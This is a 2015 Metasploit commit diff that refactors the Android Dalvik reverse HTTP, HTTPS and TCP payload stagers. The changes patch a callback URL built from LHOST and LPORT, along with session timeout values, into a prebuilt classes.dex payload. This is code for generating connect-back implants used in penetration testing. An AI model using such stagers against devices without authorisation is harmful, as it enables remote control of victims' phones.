Modify the staging process

OJ · OJ · commit e796e56c6ce6 · 2015-06-24T13:22:33.000+10:00
diff --git a/lib/msf/core/payload/dalvik.rb b/lib/msf/core/payload/dalvik.rb
@@ -32,8 +32,13 @@ def java_string(str)
   end
 
   def apply_options(classes)
-    string_sub(classes, 'TTTT                                ', "TTTT" + datastore['SessionRetryTotal'].to_s)
-    string_sub(classes, 'SSSS                                ', "SSSS" + datastore['SessionRetryWait'].to_s)
+    timeouts = [
+      datastore['SessionExpirationTimeout'].to_s,
+      datastore['SessionCommunicationTimeout'].to_s,
+      datastore['SessionRetryTotal'].to_s,
+      datastore['SessionRetryWait'].to_s
+    ].join('-')
+    string_sub(classes, 'TTTT                                ', 'TTTT' + timeouts)
   end
 
   def string_sub(data, placeholder="", input="")
diff --git a/modules/payloads/stagers/android/reverse_http.rb b/modules/payloads/stagers/android/reverse_http.rb
@@ -17,15 +17,15 @@ module Metasploit3
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'          => 'Dalvik Reverse HTTP Stager',
-      'Description'   => 'Tunnel communication over HTTP',
-      'Author'        => 'anwarelmakrahy',
-      'License'       => MSF_LICENSE,
-      'Platform'      => 'android',
-      'Arch'          => ARCH_DALVIK,
-      'Handler'       => Msf::Handler::ReverseHttp,
-      'Stager'        => {'Payload' => ""}
-      ))
+      'Name'        => 'Dalvik Reverse HTTP Stager',
+      'Description' => 'Tunnel communication over HTTP',
+      'Author'      => ['anwarelmakrahy', 'OJ Reeves'],
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'android',
+      'Arch'        => ARCH_DALVIK,
+      'Handler'     => Msf::Handler::ReverseHttp,
+      'Stager'      => {'Payload' => ''}
+    ))
   end
 
   def generate_jar(opts={})
@@ -36,13 +36,12 @@ def generate_jar(opts={})
       uri_req_len = 5
     end
 
-    lurl = "ZZZZhttp://#{datastore["LHOST"]}"
-    lurl << ":#{datastore["LPORT"]}" if datastore["LPORT"]
-    lurl << "/"
-    lurl << generate_uri_uuid_mode(:init_java, uri_req_len)
+    url = "http://#{datastore["LHOST"]}:#{datastore["LPORT"]}/"
+    # TODO: perhaps wire in an existing UUID from opts?
+    url << generate_uri_uuid_mode(:init_java, uri_req_len)
 
     classes = MetasploitPayloads.read('android', 'apk', 'classes.dex')
-    string_sub(classes, 'ZZZZ' + ' ' * 512, lurl)
+    string_sub(classes, 'ZZZZ' + ' ' * 512, 'ZZZZ' + url)
     apply_options(classes)
 
     jar = Rex::Zip::Jar.new
diff --git a/modules/payloads/stagers/android/reverse_https.rb b/modules/payloads/stagers/android/reverse_https.rb
@@ -17,14 +17,14 @@ module Metasploit3
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'          => 'Dalvik Reverse HTTPS Stager',
-      'Description'   => 'Tunnel communication over HTTPS',
-      'Author'        => 'anwarelmakrahy',
-      'License'       => MSF_LICENSE,
-      'Platform'      => 'android',
-      'Arch'          => ARCH_DALVIK,
-      'Handler'       => Msf::Handler::ReverseHttps,
-      'Stager'        => {'Payload' => ""}
+      'Name'        => 'Dalvik Reverse HTTPS Stager',
+      'Description' => 'Tunnel communication over HTTPS',
+      'Author'      => ['anwarelmakrahy', 'OJ Reeves'],
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'android',
+      'Arch'        => ARCH_DALVIK,
+      'Handler'     => Msf::Handler::ReverseHttps,
+      'Stager'      => {'Payload' => ''}
     ))
   end
 
@@ -36,13 +36,12 @@ def generate_jar(opts={})
       uri_req_len = 5
     end
 
-    lurl = "ZZZZhttps://#{datastore["LHOST"]}"
-    lurl << ":#{datastore["LPORT"]}" if datastore["LPORT"]
-    lurl << "/"
-    lurl << generate_uri_uuid_mode(:init_java, uri_req_len)
+    url = "https://#{datastore["LHOST"]}:#{datastore["LPORT"]}/"
+    # TODO: perhaps wire in an existing UUID from opts?
+    url << generate_uri_uuid_mode(:init_java, uri_req_len)
 
     classes = MetasploitPayloads.read('android', 'apk', 'classes.dex')
-    string_sub(classes, 'ZZZZ' + ' ' * 512, lurl)
+    string_sub(classes, 'ZZZZ' + ' ' * 512, 'ZZZZ' + url)
 
     verify_cert_hash = get_ssl_cert_hash(datastore['StagerVerifySSLCert'],
                                          datastore['HandlerSSLCert'])
diff --git a/modules/payloads/stagers/android/reverse_tcp.rb b/modules/payloads/stagers/android/reverse_tcp.rb
@@ -8,7 +8,7 @@
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
 
-module Metasploit3
+module Metasploit4
 
   CachedSize = :dynamic
 
@@ -17,14 +17,14 @@ module Metasploit3
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'			=> 'Dalvik Reverse TCP Stager',
-      'Description'	=> 'Connect back stager',
-      'Author'		=> 'timwr',
-      'License'		=> MSF_LICENSE,
-      'Platform'		=> 'android',
-      'Arch'			=> ARCH_DALVIK,
-      'Handler'		=> Msf::Handler::ReverseTcp,
-      'Stager'		=> {'Payload' => ""}
+      'Name'        => 'Dalvik Reverse TCP Stager',
+      'Description' => 'Connect back stager',
+      'Author'      => ['timwr', 'OJ Reeves'],
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'android',
+      'Arch'        => ARCH_DALVIK,
+      'Handler'     => Msf::Handler::ReverseTcp,
+      'Stager'      => {'Payload' => ''}
     ))
   end
 
@@ -37,8 +37,8 @@ def generate_jar(opts={})
 
     classes = MetasploitPayloads.read('android', 'apk', 'classes.dex')
 
-    string_sub(classes, 'XXXX127.0.0.1                       ', "XXXX" + datastore['LHOST'].to_s) if datastore['LHOST']
-    string_sub(classes, 'YYYY4444                            ', "YYYY" + datastore['LPORT'].to_s) if datastore['LPORT']
+    url = "tcp://#{datastore['LHOST']}:#{datastore['LPORT']}"
+    string_sub(classes, 'ZZZZ' + ' ' * 512, 'ZZZZ' + url)
     apply_options(classes)
 
     jar.add_file("classes.dex", fix_dex_header(classes))
